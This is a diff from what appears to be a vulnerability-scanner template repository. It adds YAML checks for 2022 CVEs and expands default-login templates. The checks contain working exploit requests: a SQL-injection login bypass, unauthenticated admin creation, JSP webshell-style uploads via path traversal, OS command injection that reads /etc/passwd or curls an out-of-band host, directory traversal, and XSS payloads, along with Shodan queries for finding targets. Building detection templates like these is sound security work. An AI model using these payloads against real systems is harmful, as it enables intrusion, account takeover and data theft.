https://www.voipmonitor.org/changelog-gui?major=5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24260 + cwe-id: CWE-89 + metadata: + shodan-query: http.title:"VoIPmonitor" + tags: cve,cve2022,voipmonitor,sqli,unauth + +requests: + - raw: + - | + POST /api.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; # + + matchers-condition: and + matchers: + - type: word + words: + - '"success":true' + - '_vm_version' + - '_debug' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - PHPSESSID + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-24288.yaml b/cves/2022/CVE-2022-24288.yaml new file mode 100644 index 0000000000..d5a45b194d --- /dev/null +++ b/cves/2022/CVE-2022-24288.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-24288 + +info: + name: Apache Airflow OS Command Injection + author: xeldax + severity: high + description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI. + reference: + - https://github.com/advisories/GHSA-3v7g-4pg3-7r6j + - https://nvd.nist.gov/vuln/detail/CVE-2022-24288 + - https://lists.apache.org/thread/dbw5ozcmr0h0lhs0yjph7xdc64oht23t + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-24288 + cwe-id: CWE-78 + metadata: + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + verified: true + tags: cve,cve2022,airflow,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command" + - "{{BaseURL}}/code?dag_id=example_passing_params_via_test_command" + + stop-at-first-match: true + matchers: + - type: word + words: + - 'foo was passed in via Airflow CLI Test command with value {{ params.foo }}' # Works with unauthenticated airflow instance + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2022/CVE-2022-24990.yaml b/cves/2022/CVE-2022-24990.yaml new file mode 100644 index 0000000000..5a4803857b --- /dev/null +++ b/cves/2022/CVE-2022-24990.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-24990 + +info: + name: TerraMaster TOS < 4.2.30 Server Information Disclosure + author: dwisiswant0 + severity: medium + description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure. + reference: + - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ + classification: + cve-id: CVE-2022-24990 + metadata: + shodan-query: TerraMaster + tags: cve,cve2022,terramaster,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/module/api.php?mobile/webNasIPS" + headers: + User-Agent: "TNAS" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json" + - "TerraMaster" + condition: and + + - type: regex + part: body + regex: + - "webNasIPS successful" + - "(ADDR|(IFC|PWD|[DS]AT)):" + - "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick + condition: or + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2022/CVE-2022-25216.yaml b/cves/2022/CVE-2022-25216.yaml new file mode 100644 index 0000000000..736ee3bfa6 --- /dev/null +++ b/cves/2022/CVE-2022-25216.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-25216 + +info: + name: DVDFab 12 Player/PlayerFab - Arbitrary File Read + author: 0x_Akoko + severity: high + description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access + reference: + - https://www.tenable.com/security/research/tra-2022-07 + - https://www.cvedetails.com/cve/CVE-2022-25216 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-25216 + cwe-id: CWE-22 + tags: cve,cve2022,dvdFab,lfi,lfr + +requests: + - method: GET + path: + - "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-25323.yaml b/cves/2022/CVE-2022-25323.yaml new file mode 100644 index 0000000000..c5d5548842 --- /dev/null +++ b/cves/2022/CVE-2022-25323.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-25323 + +info: + name: ZEROF Web Server 2.0 Cross-Site Scripting + author: pikpikcu + severity: medium + description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. + reference: + - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 + - https://awillix.ru + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-25323 + cwe-id: CWE-79 + tags: xss,cve,cve2022,zerof + +requests: + - method: GET + path: + - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'back<img src=x onerror=alert(document.domain)>' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 401 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2022/CVE-2022-25369.yaml b/cves/2022/CVE-2022-25369.yaml new file mode 100644 index 0000000000..59f1d22aeb --- /dev/null +++ b/cves/2022/CVE-2022-25369.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-25369 + +info: + name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation + author: pdteam + severity: critical + description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. + reference: + - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-25369 + cwe-id: CWE-425 + remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' + metadata: + shodan-query: http.component:"Dynamicweb" + tags: cve,cve2022,dynamicweb,rce,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Success": true' + - '"Success":true' + condition: or + + - type: word + part: header + words: + - 'application/json' + - 'ASP.NET_SessionId' + condition: and + case-insensitive: true + + - type: status + status: + - 200 + +# Enhanced by cs on 2022/02/28 diff --git a/cves/2022/CVE-2022-26148.yaml b/cves/2022/CVE-2022-26148.yaml new file mode 100644 index 0000000000..315b0b25a8 --- /dev/null +++ b/cves/2022/CVE-2022-26148.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-26148 + +info: + name: Grafana & Zabbix Integration - Credential Disclosure + author: Geekby + severity: critical + description: | + Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + reference: + - https://2k8.org/post-319.html + - https://security.netapp.com/advisory/ntap-20220425-0005/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-26148 + metadata: + fofa-query: app="Grafana" + shodan-query: title:"Grafana" + tags: cve,cve2022,grafana,zabbix,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + condition: and + + - type: word + part: body + words: + - '"zabbix":' + - '"zbx":' + - "alexanderzobnin-zabbix-datasource" + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' + +# Enhanced by mp on 2022/05/19 diff --git a/cves/2022/CVE-2022-26159.yaml b/cves/2022/CVE-2022-26159.yaml new file mode 100644 index 0000000000..41d6be2d94 --- /dev/null +++ b/cves/2022/CVE-2022-26159.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-26159 + +info: + name: Ametys CMS Information Disclosure + author: Remi Gascou (podalirius) + severity: medium + description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 + - https://podalirius.net/en/cves/2022-26159/ + - https://issues.ametys.org/browse/CMS-10973 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-26159 + tags: cve,cve2022,plugin,ametys,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' + + matchers-condition: and + matchers: + - type: word + words: + - '<auto-completion>' + - '<item>' + condition: and + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2022/CVE-2022-26233.yaml b/cves/2022/CVE-2022-26233.yaml new file mode 100644 index 0000000000..7a7376e711 --- /dev/null +++ b/cves/2022/CVE-2022-26233.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-26233 + +info: + name: Barco Control Room Management Suite - Directory Traversal + author: 0x_Akoko + severity: high + description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. + reference: + - https://0day.today/exploit/37579 + - https://www.cvedetails.com/cve/CVE-2022-26233 + - http://seclists.org/fulldisclosure/2022/Apr/0 + - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-26233 + cwe-id: CWE-22 + tags: cve,cve2022,barco,lfi + +requests: + - raw: + - |+ + GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/cves/2022/CVE-2022-26352.yaml b/cves/2022/CVE-2022-26352.yaml new file mode 100644 index 0000000000..b73a664312 --- /dev/null +++ b/cves/2022/CVE-2022-26352.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-26352 + +info: + name: DotCMS - Arbitrary File Upload + author: h1ei1 + severity: critical + description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. + reference: + - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ + - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 + classification: + cve-id: CVE-2022-26352 + tags: cve,cve2022,rce,dotcms + +requests: + - raw: + - | + POST /api/content/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3 + + --------------------------aadc326f7ae3eac3 + Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp" + Content-Type: text/plain + + <% + out.println("CVE-2022-26352"); + %> + --------------------------aadc326f7ae3eac3-- + + - | + GET /{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "CVE-2022-26352")' + - 'status_code_2 == 200' + condition: and + +# Enhanced by mp on 2022/05/19 diff --git a/cves/2022/CVE-2022-26564.yaml b/cves/2022/CVE-2022-26564.yaml new file mode 100644 index 0000000000..2ab7c18173 --- /dev/null +++ b/cves/2022/CVE-2022-26564.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-26564 + +info: + name: HotelDruid Hotel Management Software 3.0.3 XSS + author: alexrydzak + severity: medium + description: | + HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability. + reference: + - https://rydzak.me/2022/04/cve-2022-26564/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 + - https://www.hoteldruid.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-26564 + cwe-id: CWE-79 + metadata: + shodan-query: http.favicon.hash:-1521640213 + tags: cve,cve2022,hoteldruid,xss +requests: + - method: GET + path: + - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>' + - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1' + - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<script>javascript:alert('XSS')</script>" + - "HotelDruid" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2022/CVE-2022-27849.yaml b/cves/2022/CVE-2022-27849.yaml new file mode 100644 index 0000000000..1600ad9e9f --- /dev/null +++ b/cves/2022/CVE-2022-27849.yaml @@ -0,0 +1,43 @@ +id: CVE-2022-27849 +info: + name: WordPress Simple Ajax Chat plugin <= 20220115 - Sensitive Information Disclosure vulnerability + author: random-robbie + severity: high + description: | + Simple Ajax Chat < 20220216 - Sensitive Information Disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it + reference: + - https://wordpress.org/plugins/simple-ajax-chat/#developers + - https://nvd.nist.gov/vuln/detail/CVE-2022-27849/ + - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-27849 + cwe-id: CWE-200 + metadata: + google-dork: inurl:/wp-content/plugins/simple-ajax-chat/ + tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Chat Log"' + - '"User IP"' + - '"User ID"' + condition: and + + - type: word + part: header + words: + - text/csv + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-28363.yaml b/cves/2022/CVE-2022-28363.yaml new file mode 100644 index 0000000000..b78b96ed26 --- /dev/null +++ b/cves/2022/CVE-2022-28363.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-28363 + +info: + name: Reprise License Manager 14.2 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: | + Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28363 + - https://www.reprisesoftware.com/products/software-license-management.php + - https://github.com/advisories/GHSA-rpvc-qgrm-r54f + - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-28363 + cwe-id: CWE-79 + tags: cve,cve2022,xss,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '<svg/onload=alert(document.domain)>' + - 'Login Failed' + condition: and + + - type: word + part: header + words: + - "text/html" diff --git a/cves/2022/CVE-2022-28365.yaml b/cves/2022/CVE-2022-28365.yaml new file mode 100644 index 0000000000..2260c8d8ae --- /dev/null +++ b/cves/2022/CVE-2022-28365.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-28365 + +info: + name: Reprise License Manager 14.2 - Information Disclosure + author: Akincibor + severity: medium + description: | + Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28365 + - https://www.reprisesoftware.com/products/software-license-management.php + - https://github.com/advisories/GHSA-4g2v-6x25-vr7p + - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-28365 + cwe-id: CWE-668 + tags: cve,cve2022,exposure,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goforms/rlminfo" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "RLM Version" + - "Platform type" + condition: and diff --git a/cves/2022/CVE-2022-29303.yaml b/cves/2022/CVE-2022-29303.yaml new file mode 100644 index 0000000000..147affdca5 --- /dev/null +++ b/cves/2022/CVE-2022-29303.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-29303 + +info: + name: SolarView Compact 6.0 - OS Command Injection + author: badboycxcc + severity: critical + description: | + SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + reference: + - https://www.exploit-db.com/exploits/50940 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 + - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29303 + cwe-id: CWE-77 + metadata: + shodan-query: http.html:"SolarView Compact" + verified: "true" + tags: cve,cve2022,rce,injection + +variables: + cmd: "cat${IFS}/etc/passwd" + +requests: + - raw: + - | + POST /conf_mail.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M + + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" diff --git a/cves/2022/CVE-2022-29464.yaml b/cves/2022/CVE-2022-29464.yaml new file mode 100644 index 0000000000..ad4db0c895 --- /dev/null +++ b/cves/2022/CVE-2022-29464.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-29464 + +info: + name: WSO2 Management - Arbitrary File Upload & Remote Code Execution + author: luci,dhiyaneshDk + severity: critical + description: | + Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0. + reference: + - https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/ + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738 + - https://github.com/hakivvi/CVE-2022-29464 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29464 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29464 + cwe-id: CWE-434 + metadata: + shodan-query: http.favicon.hash:1398055326 + tags: cve,cve2022,rce,fileupload,wso2,intrusive + +requests: + - raw: + - | + POST /fileupload/toolsAny HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311 + Content-Length: 348 + + -----------------------------250033711231076532771336998311 + Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp";filename="test.jsp" + Content-Type: application/octet-stream + + <% out.print("WSO2-RCE-CVE-2022-29464"); %> + -----------------------------250033711231076532771336998311-- + + - | + GET /authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')" + +# Enhanced by mp on 2022/05/19 diff --git a/cves/2022/CVE-2022-29548.yaml b/cves/2022/CVE-2022-29548.yaml new file mode 100644 index 0000000000..15153c4e76 --- /dev/null +++ b/cves/2022/CVE-2022-29548.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-29548 + +info: + name: WSO2 Management Console - Reflected XSS + author: edoardottt + severity: medium + description: | + A reflected XSS issue exists in the Management Console of several WSO2 products. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"carbon/admin/login" + verified: true + tags: cve,cve2022,wso2,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-30489.yaml b/cves/2022/CVE-2022-30489.yaml new file mode 100644 index 0000000000..94facbccf6 --- /dev/null +++ b/cves/2022/CVE-2022-30489.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-30489 + +info: + name: Wavlink Wn535g3 - POST XSS + author: For3stCo1d + severity: medium + description: | + WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. + reference: + - https://github.com/badboycxcc/XSS-CVE-2022-30489 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + - https://github.com/badboycxcc/XSS + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + classification: + cve-id: CVE-2022-30489 + tags: xss,cve2022,wavlink,cve,router,iot + +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn + + matchers-condition: and + matchers: + - type: word + words: + - '<script>alert(document.domain);</script>' + - 'parent.location.replace("http://")' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml new file mode 100644 index 0000000000..2f46378e32 --- /dev/null +++ b/cves/2022/CVE-2022-30525.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-30525 + +info: + name: Zyxel Firewall - OS Command Injection + author: h1ei1,prajiteshsingh + severity: critical + description: | + An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. + reference: + - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ + - https://github.com/rapid7/metasploit-framework/pull/16563 + - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml + - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 + classification: + cve-id: CVE-2022-30525 + metadata: + shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" + tags: rce,zyxel,cve,cve2022,firewall,unauth + +requests: + - raw: + - | + POST /ztp/cgi-bin/handler HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/05/19 diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml index d7dc80bd03..7f92b3251a 100644 --- a/default-logins/UCMDB/ucmdb-default-login.yaml +++ b/default-logins/UCMDB/ucmdb-default-login.yaml @@ -1,9 +1,15 @@ id: ucmdb-default-login info: - name: Micro Focus UCMDB Default Login + name: Micro Focus Universal CMDB Default Login author: dwisiswant0 severity: high + description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 + and CVE-2020-11854. + reference: + - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm + classification: + cwe-id: CWE-798 tags: ucmdb,default-login requests: @@ -31,3 +37,5 @@ requests: part: header words: - "LWSSO_COOKIE_KEY" + +# Enhanced by mp on 2022/03/07 diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 92c18a864b..9143fa25bb 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -1,13 +1,17 @@ id: cs141-default-login info: - name: CS141 SNMP Module Default Login + name: UPS Adapter CS141 SNMP Module Default Login author: socketz severity: medium - reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf - tags: hiawatha,iot,default-login + description: UPS Adapter CS141 SNMP Module default login credentials were discovered. + reference: + - https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf + classification: + cwe-id: CWE-798 metadata: shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22 + tags: hiawatha,iot,default-login requests: - raw: @@ -48,3 +52,5 @@ requests: - type: kval kval: - accessToken + +# Enhanced by mp on 2022/03/07 diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml index a4dea884a5..843f3e8cab 100644 --- a/default-logins/activemq/activemq-default-login.yaml +++ b/default-logins/activemq/activemq-default-login.yaml @@ -4,6 +4,9 @@ info: name: Apache ActiveMQ Default Login author: pdteam severity: medium + description: Apache ActiveMQ default login information was discovered. + reference: + - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html tags: apache,activemq,default-login requests: @@ -26,4 +29,6 @@ requests: words: - 'Welcome to the Apache ActiveMQ Console of <b>' - '<h2>Broker</h2>' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/07 diff --git a/default-logins/aem/aem-default-login.yaml b/default-logins/aem/aem-default-login.yaml index 4a3fe43989..66a6189c19 100644 --- a/default-logins/aem/aem-default-login.yaml +++ b/default-logins/aem/aem-default-login.yaml @@ -3,8 +3,17 @@ id: aem-default-login info: name: Adobe AEM Default Login author: random-robbie - severity: critical - tags: aem,default-login + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,default-login,adobe requests: - raw: @@ -24,12 +33,20 @@ requests: - grios - replication-receiver 